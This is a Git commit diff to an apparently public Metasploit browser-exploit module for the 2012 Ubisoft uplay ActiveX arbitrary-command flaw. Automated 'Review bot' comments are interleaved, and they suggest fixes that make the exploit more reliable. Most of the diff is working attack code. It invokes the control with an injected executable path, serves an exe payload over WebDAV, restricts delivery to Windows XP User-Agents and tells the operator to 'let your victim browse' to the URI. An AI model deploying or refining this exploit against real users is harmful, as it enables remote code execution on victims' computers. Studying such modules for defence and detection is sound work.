Lots of changes before commit.

unstable
sinn3r 2012-08-06 11:54:08 -05:00
parent 25b2b2de68
commit 69ff9e7c1c
1 changed files with 30 additions and 31 deletions


@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -17,26 +13,15 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Ubisoft uplay Active X Control Arbitrary Code Execution',
'Name' => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running.
The exploit will request an exe payload over WebDAV, and must be running on port 80.
Tested in Win XP, does not appear to work in Win7.
Ubisoft released patch 2.04 as of Mon 20th July.
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
must be run on port 80, so please make sure you have enough privilege to do that.
Ubisoft released patch 2.04 as of Mon 20th July.
},
'License' => MSF_LICENSE,
'Author' =>
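Review bot: The rewritten description drops the old "Tested in Win XP, does not appear to work in Win7" sentence, yet the same commit appears to gate delivery on a User-Agent containing `NT 5.1` (the `is_exploitable?` method further down), so a user reading only the description will not learn why non-XP clients receive a 404. I would restore that information in the new text, e.g. `Only clients whose User-Agent reports Windows XP (NT 5.1) are served; the module was tested on XP and does not appear to work on Windows 7.` The patch-date sentence `Ubisoft released patch 2.04 as of Mon 20th July.` also lacks a year, which the references suggest is 2012; stating it explicitly avoids ambiguity later. The `initialize` method this description belongs to continues outside the hunk.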
@ -46,15 +31,15 @@ class Metasploit3 < Msf::Exploit::Remote
'phillips321 <phillips321[at]phillips321.co.uk>',
'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', 'http://osvdb.org/show/osvdb/84402'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 29 2012'))
@ -66,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
], self.class)
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80.
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
# WebDAV does not support SSL and must run over port 80.
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
end
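Review bot: The `deregister_options` call that this hunk moves still has no comma between `'SRVPORT'` and `'URIPATH'`, so Ruby concatenates the two adjacent literals into the single string `'SRVPORTURIPATH'` and neither SRVPORT nor URIPATH is actually deregistered, contrary to the comment above it. This existed before the commit and is carried over unchanged; the fix is `deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT', 'URIPATH')`. As written, a user can still override SRVPORT, which the later `exploit` output (`http://#{myhost}:#{datastore['SRVPORT']}/...`) would faithfully print while the WebDAV path silently requires port 80. The enclosing `initialize` begins before this hunk.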
def autofilter
@ -81,6 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
use_zlib
end
def is_exploitable?(req)
# Only engage Win XP SP3 targets
req.headers['User-Agent'] =~ /NT 5\.1/
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
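Review bot: The comment on the new `is_exploitable?` says "Only engage Win XP SP3 targets", but the regex `/NT 5\.1/` matches any Windows XP User-Agent regardless of service pack, and the header is entirely client-supplied, so the method is a heuristic rather than a positive identification. I would make the comment say what the code does: `# Heuristic only: "NT 5.1" in the client-supplied User-Agent identifies any Windows XP service pack, not SP3 specifically.` Note that when the header is absent, `nil =~ regex` simply yields nil, so the method degrades to "not exploitable" without raising, which is worth stating in the same comment. `on_request_uri` continues past the end of this hunk.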
@ -89,7 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
process_propfind(cli, request)
when 'GET'
if request.uri_parts['Resource'].include? @uplay_uri
prompt_uplay(cli, request)
if is_exploitable?(request)
prompt_uplay(cli, request)
else
print_error("Not the target we want, will not engage.")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
else
process_get(cli, request)
end
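Review bot: The rejection branch reports `Not the target we want, will not engage.` without saying what was seen, so an operator debugging a false negative from the User-Agent gate has nothing to compare against. I would include the header in the message, e.g. `print_error("Not the target we want (User-Agent: #{request.headers['User-Agent'].inspect}), will not engage.")`, and consider `vprint_error` since every non-matching fetch of the URI will otherwise print at normal verbosity. The enclosing `case`/`on_request_uri` starts before and ends after this hunk.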
@ -172,7 +167,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
@ -409,6 +404,10 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end
def exploit
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
if datastore['EXPLOITPATH']
@uplay_uri = datastore['EXPLOITPATH']
else
@ -424,7 +423,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end
vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
super
end